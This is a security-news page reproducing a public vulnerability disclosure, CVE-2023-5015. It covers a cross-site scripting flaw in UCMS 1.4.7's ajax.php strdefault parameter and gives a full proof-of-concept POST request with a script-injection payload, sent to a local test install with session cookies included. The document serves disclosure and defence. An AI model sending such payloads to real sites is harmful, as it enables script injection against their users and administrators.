Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-5015: The ucms has xss · Issue #3 · Num-Nine/CVE

A vulnerability was found in UCMS 1.4.7. It has been classified as problematic. Affected is an unknown function of the file ajax.php?do=strarraylist. The manipulation of the argument strdefault leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239856.

CVE
#xss#vulnerability#web#windows#git#php#firefox

1.Download address: https://github.com/forget-code/ucms

2.Vulnerability file location: http://127.0.0.1/CVE-Target/ucms-master/ucms/ajax.php? do=strarraylist

3.You need to manually create the cache and uploadfile directories during program installation

4.Ucms-master /ucms/ajax.php installed successfully? do=strarraylist

5.Send a POST request as follows

POST /CVE-Target/ucms-master/ucms/ajax.php?do=strarraylist HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/CVE-Target/ucms-master/ucms/ajax.php?do=strarraylist
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://127.0.0.1
DNT: 1
Connection: close
Cookie: admin_470315=admin; psw_470315=0fb277aadebd45b2ccc4834fe54aac4d; token_470315=b59b44f8
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

cid=2&strdefault=<script>alert(‘xss’)</script>

over!

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907